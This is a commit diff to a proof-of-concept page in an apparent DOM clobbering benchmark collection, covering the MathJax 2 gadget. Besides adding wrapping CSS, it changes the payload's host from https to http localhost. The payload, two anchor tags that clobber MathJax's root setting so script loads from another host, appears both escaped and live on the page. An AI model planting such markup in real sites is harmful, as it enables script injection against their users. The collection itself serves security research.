[Gadgets] Make sure all the poc will trigger an alert on the test page except addtoany which requires the domain starts with addtoany string

--- a/domc-gadgets-assets/gadgets/mathjax2/poc.html
+++ b/domc-gadgets-assets/gadgets/mathjax2/poc.html
@@ -5,6 +5,16 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>DOM Clobbering Micro Benchmarks</title>
     <link rel="stylesheet" href="../styles/styles.css">
+    <style>
+        /* Ensure that long lines in <pre> tags wrap */
+        pre {
+            white-space: pre-wrap;       /* CSS3 */
+            white-space: -moz-pre-wrap;  /* Mozilla */
+            white-space: -pre-wrap;      /* Opera 4-6 */
+            white-space: -o-pre-wrap;    /* Opera 7 */
+            word-wrap: break-word;       /* IE */
+        }
+    </style>
 </head>
 <body>
 <h1>DOM Clobbering Collection - mathjax2</h1>
@@ -13,9 +23,9 @@
   <div class="column">
   <p><span class="label">Payload</span><br><br>
   <pre>&lt;a id=&quot;MathJax&quot;&gt;&lt;/a&gt;
-&lt;a id=&quot;MathJax&quot; name=&quot;root&quot; href=&quot;https://localhost:9999&quot;&gt;&lt;/a&gt;</pre>
+&lt;a id=&quot;MathJax&quot; name=&quot;root&quot; href=&quot;http://localhost:9999&quot;&gt;&lt;/a&gt;</pre>
   <a id="MathJax"></a>
-<a id="MathJax" name="root" href="https://localhost:9999"></a>
+<a id="MathJax" name="root" href="http://localhost:9999"></a>
   </div>
 </section>
 
